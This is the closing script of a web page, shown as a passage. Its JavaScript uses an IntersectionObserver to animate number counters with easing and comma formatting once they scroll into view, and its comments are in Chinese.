const options = {
root: null,
rootMargin: '0px',
threshold: 0.1
};
const observer = new IntersectionObserver((entries, observer) => {
entries.forEach(entry => {
if (entry.isIntersecting) {
const counter = entry.target;
const target = parseInt(counter.innerText.replace(/,/g, ''));
const duration = 2000; // 动画持续时间(毫秒)
let startTime = null;
function updateCounter(timestamp) {
if (!startTime) startTime = timestamp;
const progress = timestamp - startTime;
const percentage = Math.min(progress / duration, 1);
// 使用缓动函数使动画更自然
const easeOutQuart = 1 - Math.pow(1 - percentage, 4);
const current = Math.floor(target * easeOutQuart);
// 添加千位分隔符
counter.innerText = current.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ",");
if (percentage < 1) {
requestAnimationFrame(updateCounter);
}
}
requestAnimationFrame(updateCounter);
observer.unobserve(counter);
}
});
}, options);
counters.forEach(counter => {
observer.observe(counter);
});
});
</script>
</body>
</html>